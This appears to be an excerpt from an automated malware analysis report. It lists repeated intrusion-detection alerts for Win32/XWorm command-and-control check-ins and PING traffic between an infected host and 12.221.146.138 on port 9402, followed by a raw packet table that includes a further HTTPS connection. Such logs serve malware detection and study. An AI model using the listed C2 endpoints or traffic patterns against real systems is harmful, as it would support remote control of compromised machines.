                                                                    2024-10-15T17:45:25.554637+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:45:32.390407+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.85809212.221.146.1389402TCP
                                                                    2024-10-15T17:45:32.651049+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:45:45.326150+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:45:55.596783+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:45:55.596783+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:45:58.027618+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:08.136615+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:17.332459+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:23.501557+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:24.501602+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:25.546587+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:25.546587+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:28.753111+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:33.517713+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:41.664779+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:42.623753+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:43.149064+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:43.518716+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:45.296248+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:45.537363+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:46.446363+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:48.771067+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:49.096956+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:49.437617+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:51.292180+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:51.417152+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:51.544193+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:52.246429+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:52.529898+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:52.889612+02002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.85809212.221.146.1389402TCP
                                                                    2024-10-15T17:46:53.138612+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:53.259764+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:54.327185+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:54.790711+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:55.568571+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:55.568571+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:56.004986+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:56.004986+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:57.671109+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:58.719544+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:58.840031+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:59.527377+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:46:59.739535+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:01.244556+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:02.307098+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:02.479914+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:04.145716+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:04.678849+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:04.803326+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:05.312029+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:05.431719+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:05.555104+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:06.084539+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:07.213714+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:08.868926+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:09.127357+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:09.387002+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:09.543030+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:09.851333+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:11.138291+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:11.475118+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:13.364947+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:16.353023+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:16.669405+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:16.964895+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:17.290407+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:17.672075+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:17.954329+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:20.575322+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:20.883903+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:21.216954+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:21.666070+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:22.169730+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:24.192264+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:24.311776+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:24.573479+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:25.270358+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:25.393549+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:25.570197+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:25.570197+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:26.465461+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:28.630328+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:30.561112+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:30.787137+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:31.140009+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:32.008737+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:32.675746+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:32.797413+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:32.926895+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:33.221170+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:34.398495+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:34.518679+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:35.114697+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:35.114873+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:35.115412+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:35.115448+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:35.116031+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:35.116098+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:35.352076+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:35.477115+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:36.405813+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:37.081732+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:37.201927+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:37.321531+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:37.781318+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:38.538460+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:38.564095+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:38.670129+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:38.739841+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:38.961517+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:40.527937+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:40.905110+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:40.911595+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:45.968527+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:46.211962+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:47.142731+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:47.503747+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:47.767259+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:48.268252+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:48.387986+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:48.557358+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:49.780928+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:49.836475+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:49.900389+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:52.573253+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:54.057145+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:54.292163+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:54.414000+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:54.539324+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:55.237705+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:55.789742+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:55.789742+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:55.789756+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:55.789756+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:56.971582+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:57.400618+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:57.915504+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:58.035116+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:58.486137+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:47:59.701277+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:00.441001+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:01.063951+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:01.499953+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:02.294998+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:03.139103+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:04.126843+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:06.485959+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:07.406036+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:07.913123+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:09.218286+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:11.056968+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:11.908804+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:12.590826+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:13.723544+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:13.843344+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:16.130109+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:22.709768+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:25.579440+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
                                                                    2024-10-15T17:48:25.579440+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.858092TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 15, 2024 17:44:47.427505016 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:47.427555084 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:47.427668095 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:47.438977003 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:47.439014912 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:48.539537907 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:48.539674997 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:48.697280884 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:48.697314978 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:48.697650909 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:48.697705984 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:48.714042902 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:48.759402990 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:49.084904909 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:49.084927082 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:49.085066080 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:49.085108042 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:49.086815119 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:49.209090948 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:49.209249973 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:49.324630976 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:49.324826956 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:49.442347050 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:49.442409039 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:49.442446947 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:49.442480087 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:49.442490101 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:49.442492962 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:44:49.442539930 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:49.452986956 CEST58053443192.168.2.8103.53.40.62
                                                                    Oct 15, 2024 17:44:49.453020096 CEST44358053103.53.40.62192.168.2.8
                                                                    Oct 15, 2024 17:45:19.564538956 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:45:19.569438934 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:45:19.569561958 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:45:19.673064947 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:45:19.678186893 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:45:25.554636955 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:45:25.595417023 CEST580929402192.168.2.812.221.146.138
